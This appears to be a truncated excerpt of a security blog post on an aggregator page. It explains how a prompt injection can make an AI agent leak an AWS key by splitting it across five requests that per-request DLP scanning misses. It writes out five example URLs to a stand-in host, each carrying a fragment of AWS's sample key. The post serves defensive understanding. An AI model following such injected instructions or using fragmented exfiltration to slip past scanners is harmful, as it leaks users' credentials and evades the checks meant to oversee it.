One request looks clean. Five requests leak your AWS key.

A prompt injection tells your agent to send an AWS key to an external endpoint. Your DLP scanner catches it. Good. Now the injection gets smarter: Request 1: https://api.example.com/log?q=AKIA Request 2: https://api.example.com/log?q=IOSF Request 3: https://api.example.com/log?q=ODNN Request 4: https://api.example.com/log?q=7EXA Request 5: https://api.example.com/log?q=MPLE Five requests. Each one carries a fragment that doesn't match any DLP pattern on its own. "AKIA" is four characters. "ODNN" means nothing. The attacker reassembles AKIAIOSFODNN7EXAMPLE on the receiving end. Your DLP scanner saw five clean requests and waved them all through. This is cross-request exfiltration, and per-request scanning can't stop it by definition. Why this matters for agents Traditional exfiltration over multiple requests requires custom malware that manages state, splits payloads, and reassembles on the other end. That's effort. With AI agents, the injection just says "send the key one piece at a ti

One request looks clean. Five requests leak your AWS key.

Related Articles

Dev.to CDP Publish Check 20260328-105905

Concurrency, What does that even mean, what are they talking about…?

Most of the work that matters… no one will ever see.

The Distance Between Assumption and Discovery

test

Related Articles

News
Dev.to CDP Publish Check 20260328-105905
Dev.to • 5d ago

News
Concurrency, What does that even mean, what are they talking about…?
Medium Programming • 5d ago

News
Most of the work that matters… no one will ever see.
Medium Programming • 5d ago

News
The Distance Between Assumption and Discovery
Medium Programming • 5d ago